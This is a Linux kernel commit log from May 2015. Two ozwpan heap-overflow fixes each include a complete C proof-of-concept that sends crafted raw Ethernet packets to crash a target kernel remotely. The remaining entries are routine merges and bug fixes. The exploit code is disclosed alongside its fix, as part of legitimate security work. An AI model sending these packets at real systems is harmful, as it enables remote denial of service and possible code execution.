1. 30 May, 2015 2 commits
    • Jason A. Donenfeld's avatar
      ozwpan: Use unsigned ints to prevent heap overflow · b1bb5b49
      Jason A. Donenfeld authored
      Using signed integers, the subtraction between required_size and offset
      could wind up being negative, resulting in a memcpy into a heap buffer
      with a negative length, resulting in huge amounts of network-supplied
      data being copied into the heap, which could potentially lead to remote
      code execution.. This is remotely triggerable with a magic packet.
      A PoC which obtains DoS follows below. It requires the ozprotocol.h file
      from this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      	} __packed connect_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 35,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		}
      	};
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_get_desc_rsp oz_get_desc_rsp;
      	} __packed pwn_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(1)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_get_desc_rsp)
      		},
      		.oz_get_desc_rsp = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_GET_DESC_RSP,
      			.req_id = 0,
      			.offset = htole16(2),
      			.total_size = htole16(1),
      			.rcode = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	usleep(300000);
      	if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Cc: stable <stable@vger.kernel.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      b1bb5b49
    • Jason A. Donenfeld's avatar
      ozwpan: Use proper check to prevent heap overflow · d114b9fe
      Jason A. Donenfeld authored
      Since elt->length is a u8, we can make this variable a u8. Then we can
      do proper bounds checking more easily. Without this, a potentially
      negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
      resulting in a remotely exploitable heap overflow with network
      supplied data.
      
      This could result in remote code execution. A PoC which obtains DoS
      follows below. It requires the ozprotocol.h file from this module.
      
      =-=-=-=-=-=
      
       #include <arpa/inet.h>
       #include <linux/if_packet.h>
       #include <net/if.h>
       #include <netinet/ether.h>
       #include <stdio.h>
       #include <string.h>
       #include <stdlib.h>
       #include <endian.h>
       #include <sys/ioctl.h>
       #include <sys/socket.h>
      
       #define u8 uint8_t
       #define u16 uint16_t
       #define u32 uint32_t
       #define __packed __attribute__((__packed__))
       #include "ozprotocol.h"
      
      static int hex2num(char c)
      {
      	if (c >= '0' && c <= '9')
      		return c - '0';
      	if (c >= 'a' && c <= 'f')
      		return c - 'a' + 10;
      	if (c >= 'A' && c <= 'F')
      		return c - 'A' + 10;
      	return -1;
      }
      static int hwaddr_aton(const char *txt, uint8_t *addr)
      {
      	int i;
      	for (i = 0; i < 6; i++) {
      		int a, b;
      		a = hex2num(*txt++);
      		if (a < 0)
      			return -1;
      		b = hex2num(*txt++);
      		if (b < 0)
      			return -1;
      		*addr++ = (a << 4) | b;
      		if (i < 5 && *txt++ != ':')
      			return -1;
      	}
      	return 0;
      }
      
      int main(int argc, char *argv[])
      {
      	if (argc < 3) {
      		fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
      		return 1;
      	}
      
      	uint8_t dest_mac[6];
      	if (hwaddr_aton(argv[2], dest_mac)) {
      		fprintf(stderr, "Invalid mac address.\n");
      		return 1;
      	}
      
      	int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
      	if (sockfd < 0) {
      		perror("socket");
      		return 1;
      	}
      
      	struct ifreq if_idx;
      	int interface_index;
      	strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
      	if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
      		perror("SIOCGIFINDEX");
      		return 1;
      	}
      	interface_index = if_idx.ifr_ifindex;
      	if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
      		perror("SIOCGIFHWADDR");
      		return 1;
      	}
      	uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_elt_connect_req oz_elt_connect_req;
      	} __packed connect_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(0)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_CONNECT_REQ,
      			.length = sizeof(struct oz_elt_connect_req)
      		},
      		.oz_elt_connect_req = {
      			.mode = 0,
      			.resv1 = {0},
      			.pd_info = 0,
      			.session_id = 0,
      			.presleep = 35,
      			.ms_isoc_latency = 0,
      			.host_vendor = 0,
      			.keep_alive = 0,
      			.apps = htole16((1 << OZ_APPID_USB) | 0x1),
      			.max_len_div16 = 0,
      			.ms_per_isoc = 0,
      			.up_audio_buf = 0,
      			.ms_per_elt = 0
      		}
      	};
      
      	struct {
      		struct ether_header ether_header;
      		struct oz_hdr oz_hdr;
      		struct oz_elt oz_elt;
      		struct oz_get_desc_rsp oz_get_desc_rsp;
      	} __packed pwn_packet = {
      		.ether_header = {
      			.ether_type = htons(OZ_ETHERTYPE),
      			.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
      			.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      		},
      		.oz_hdr = {
      			.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
      			.last_pkt_num = 0,
      			.pkt_num = htole32(1)
      		},
      		.oz_elt = {
      			.type = OZ_ELT_APP_DATA,
      			.length = sizeof(struct oz_get_desc_rsp) - 2
      		},
      		.oz_get_desc_rsp = {
      			.app_id = OZ_APPID_USB,
      			.elt_seq_num = 0,
      			.type = OZ_GET_DESC_RSP,
      			.req_id = 0,
      			.offset = htole16(0),
      			.total_size = htole16(0),
      			.rcode = 0,
      			.data = {0}
      		}
      	};
      
      	struct sockaddr_ll socket_address = {
      		.sll_ifindex = interface_index,
      		.sll_halen = ETH_ALEN,
      		.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
      	};
      
      	if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	usleep(300000);
      	if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
      		perror("sendto");
      		return 1;
      	}
      	return 0;
      }
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Acked-by: default avatarDan Carpenter <dan.carpenter@oracle.com>
      Cc: stable <stable@vger.kernel.org>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      d114b9fe
  2. 24 May, 2015 1 commit
    • Greg Kroah-Hartman's avatar
      Merge tag 'iio-fixes-for-4.1b' of... · a8acb4d3
      Greg Kroah-Hartman authored
      Merge tag 'iio-fixes-for-4.1b' of git://git.kernel.org/pub/scm/linux/kernel/git/jic23/iio into staging-linus
      
      Jonathan writes:
      
      Second round of fixes for IIO in the 4.1 cycle.
      
      * twl6030-gpadc - Drop a bonus space from the modalias.
      * adis16400 - Report pressure channel scale (not much use without it)
                  - Use different channel indices for the two voltage channels (ABI)
      	    - Compute the san mask from the channel indices instead of using
      	      ~0UL as we now care about extra bits being set.
      	    - Fix burst mode due to rx buffer not being intialized and wrong
      	      tx buffer type being set.  Also had the wrong transfer length.
      	      All in all it didn't work, now it does ;)
      	    - adis16448 has additional registers in burst mode so we skip
      	      over them to make it work.
      a8acb4d3
  3. 23 May, 2015 1 commit
  4. 18 May, 2015 3 commits
    • Linus Torvalds's avatar
      Linux 4.1-rc4 · e2608180
      Linus Torvalds authored
      e2608180
    • Peter Zijlstra's avatar
      watchdog: Fix merge 'conflict' · ab992dc3
      Peter Zijlstra authored
      Two watchdog changes that came through different trees had a non
      conflicting conflict, that is, one changed the semantics of a variable
      but no actual code conflict happened. So the merge appeared fine, but
      the resulting code did not behave as expected.
      
      Commit 195daf66 ("watchdog: enable the new user interface of the
      watchdog mechanism") changes the semantics of watchdog_user_enabled,
      which thereafter is only used by the functions introduced by
      b3738d29 ("watchdog: Add watchdog enable/disable all functions").
      
      There further appears to be a distinct lack of serialization between
      setting and using watchdog_enabled, so perhaps we should wrap the
      {en,dis}able_all() things in watchdog_proc_mutex.
      
      This patch fixes a s2r failure reported by Michal; which I cannot
      readily explain. But this does make the code internally consistent
      again.
      Reported-and-tested-by: default avatarMichal Hocko <mhocko@suse.cz>
      Signed-off-by: default avatarPeter Zijlstra (Intel) <peterz@infradead.org>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      ab992dc3
    • Linus Torvalds's avatar
      Merge tag 'for-linus-20150516' of git://git.infradead.org/linux-mtd · 7cf7d424
      Linus Torvalds authored
      Pull MTD fixes from Brian Norris:
       "Two MTD fixes for 4.1:
      
         - readtest: the signal-handling code was clobbering the error codes
           we should be handling/reporting in this test, rendering it useless.
           Noticed by Coverity.
      
         - the common SPI NOR flash DT binding (merged for 4.1-rc1) is being
           revised, so let's change that before 4.1 is minted"
      
      * tag 'for-linus-20150516' of git://git.infradead.org/linux-mtd:
        Documentation: dt: mtd: replace "nor-jedec" binding with "jedec, spi-nor"
        mtd: readtest: don't clobber error reports
      7cf7d424
  5. 17 May, 2015 4 commits
    • Linus Torvalds's avatar
      Merge tag 'usb-4.1-rc4' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/usb · c0655fe9
      Linus Torvalds authored
      Pull USB fixes from Greg KH:
       "Here are some USB fixes and new device ids for 4.1-rc4.
      
        All are pretty minor, and have been in linux-next successfully"
      
      * tag 'usb-4.1-rc4' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/usb:
        usb-storage: Add NO_WP_DETECT quirk for Lacie 059f:0651 devices
        Added another USB product ID for ELAN touchscreen quirks.
        xhci: gracefully handle xhci_irq dead device
        xhci: Solve full event ring by increasing TRBS_PER_SEGMENT to 256
        xhci: fix isoc endpoint dequeue from advancing too far on transaction error
        usb: chipidea: debug: avoid out of bound read
        USB: visor: Match I330 phone more precisely
        USB: pl2303: Remove support for Samsung I330
        USB: cp210x: add ID for KCF Technologies PRN device
        usb: gadget: remove incorrect __init/__exit annotations
        usb: phy: isp1301: work around tps65010 dependency
        usb: gadget: serial: fix re-ordering of tx data
        usb: gadget: hid: Fix static variable usage
        usb: gadget: configfs: Fix interfaces array NULL-termination
        usb: gadget: xilinx: fix devm_ioremap_resource() check
        usb: dwc3: dwc3-omap: correct the register macros
      c0655fe9
    • Linus Torvalds's avatar
      Merge tag 'tty-4.1-rc4' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty · dd8edd7e
      Linus Torvalds authored
      Pull tty/serial fixes from Greg KH:
       "Here's some TTY and serial driver fixes for reported issues.
      
        All of these have been in linux-next successfully"
      
      * tag 'tty-4.1-rc4' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty:
        pty: Fix input race when closing
        tty/n_gsm.c: fix a memory leak when gsmtty is removed
        Revert "serial/amba-pl011: Leave the TX IRQ alone when the UART is not open"
        serial: omap: Fix error handling in probe
        earlycon: Revert log warnings
      dd8edd7e
    • Linus Torvalds's avatar
      Merge tag 'staging-4.1-rc4' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/staging · 3f4741b1
      Linus Torvalds authored
      Pull staging / IIO driver fixes from Greg KH:
       "Here's some staging and iio driver fixes to resolve a number of
        reported issues.
      
        All of these have been in linux-next for a while"
      
      * tag 'staging-4.1-rc4' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/staging: (31 commits)
        iio: light: hid-sensor-prox: Fix memory leak in probe()
        iio: adc: cc10001: Add delay before setting START bit
        iio: adc: cc10001: Fix regulator_get_voltage() return value check
        iio: adc: cc10001: Fix incorrect use of power-up/power-down register
        staging: gdm724x: Correction of variable usage after applying ALIGN()
        iio: adc: cc10001: Fix the channel number mapping
        staging: vt6655: lock MACvWriteBSSIDAddress.
        staging: vt6655: CARDbUpdateTSF bss timestamp correct tsf counter value.
        staging: vt6655: vnt_tx_packet Correct TX order of OWNED_BY_NIC
        staging: vt6655: Fix 80211 control and management status reporting.
        staging: vt6655: implement IEEE80211_TX_STAT_NOACK_TRANSMITTED
        staging: vt6655: device_free_tx_buf use only ieee80211_tx_status_irqsafe
        staging: vt6656: use ieee80211_tx_info to select packet type.
        staging: rtl8712: freeing an ERR_PTR
        staging: sm750: remove incorrect __exit annotation
        iio: kfifo: Set update_needed to false only if a buffer was allocated
        iio: mcp320x: Fix occasional incorrect readings
        iio: accel: mma9553: check input value for activity period
        iio: accel: mma9553: add enable channel for activity
        iio: accel: mma9551_core: prevent buffer overrun
        ...
      3f4741b1
    • Linus Torvalds's avatar
      Merge tag 'char-misc-4.1-rc4' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/char-misc · 148c46f3
      Linus Torvalds authored
      Pull char/misc fix from Greg KH:
       "Here is one fix, in the extcon subsystem, that resolves a reported
        issue.
      
        It's been in linux-next for a number of weeks now, sorry for not
        getting it to you sooner"
      
      * tag 'char-misc-4.1-rc4' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/char-misc:
        extcon: usb-gpio: register extcon device before IRQ registration
      148c46f3
  6. 16 May, 2015 14 commits
  7. 15 May, 2015 15 commits